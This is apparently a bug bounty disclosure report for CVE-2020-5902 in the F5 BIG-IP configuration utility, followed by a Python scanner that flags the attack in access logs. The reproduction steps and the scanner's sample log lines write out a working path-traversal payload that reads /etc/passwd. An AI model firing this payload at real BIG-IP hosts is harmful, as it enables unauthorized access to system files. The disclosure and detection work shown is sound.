CVE-2020-5902
Critical
AWS VDP
Reported by
perigou
Vulnerability Details
Technical details and impact analysis
**CVE ID:** CVE-2020-5902
**Description:**
Affected Product: F5 BIG-IP Traffic Management User Interface (TMUI)
Severity: Critical
CVSS Score: 9.8
Description: Remote Code Execution (RCE) vulnerability in undisclosed pages of the TMUI
CVE-2020-5902 is a critical vulnerability affecting the BIG-IP Traffic Management User Interface (TMUI), also known as the Configuration utility. This vulnerability allows for Remote Code Execution (RCE) in undisclosed pages of the TMUI.
Affected Versions
BIG-IP versions ████
BIG-IP versions █████
BIG-IP versions ███
BIG-IP versions ███
BIG-IP versions ███
## Steps To Reproduce:
## URL:
███
Payload used: `/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd`
Full URL:
█████████?fileName=/etc/passwd
## Impact
## Summary:
The vulnerability can be exploited by an attacker to execute arbitrary code on the affected system, leading to unauthorized access, data breaches, and system compromise.
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2020-5902
UNKNOWN
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
Report Details
Additional information and metadata
State
Closed
Substate
Informative
Submitted
Weakness
Using Components with Known Vulnerabilities
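
As an added example (not part of the report and not F5 tooling), this is one way to search web access logs for the `..;` path segment used by the payload under Steps To Reproduce. It goes beyond the report by also catching percent-encoded forms of that segment. The combined log format, the sample lines and the `REDACTED-PREFIX` placeholder are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A path segment that starts with "..;", the shape used by the report's payload.
DOT_SEMI_SEGMENT = re.compile(r'(^|/)\.\.;[^/]*(/|$)')

# Constructed sample lines, not taken from the report. REDACTED-PREFIX is a
# placeholder for the part of the URL that the report redacts.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Jul/2020:10:01:02 +0000] "GET /REDACTED-PREFIX/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1532',
    '203.0.113.7 - - [06/Jul/2020:10:01:09 +0000] "GET /REDACTED-PREFIX/%2e%2e%3b/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1532',
    '198.51.100.4 - - [06/Jul/2020:10:02:00 +0000] "GET /index.html?next=a;b HTTP/1.1" 200 512',
]


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so single and double encoding are both seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(log_line):
    """Return None for a clean line, else a dict describing the flagged request."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    # Split on the first "?" only, so ";" inside the query string is ignored.
    path, _, query = m.group("target").partition("?")
    path = fully_decode(path)
    if not DOT_SEMI_SEGMENT.search(path):
        return None
    return {"method": m.group("method"), "path": path,
            "targets_tmui": "/tmui/" in path.lower(),
            "query": fully_decode(query)}


def scan(lines):
    """Return the hits for every flagged line, in input order."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with `targets_tmui` set on a BIG-IP management interface is worth triaging against the affected version ranges listed in the CVE description above.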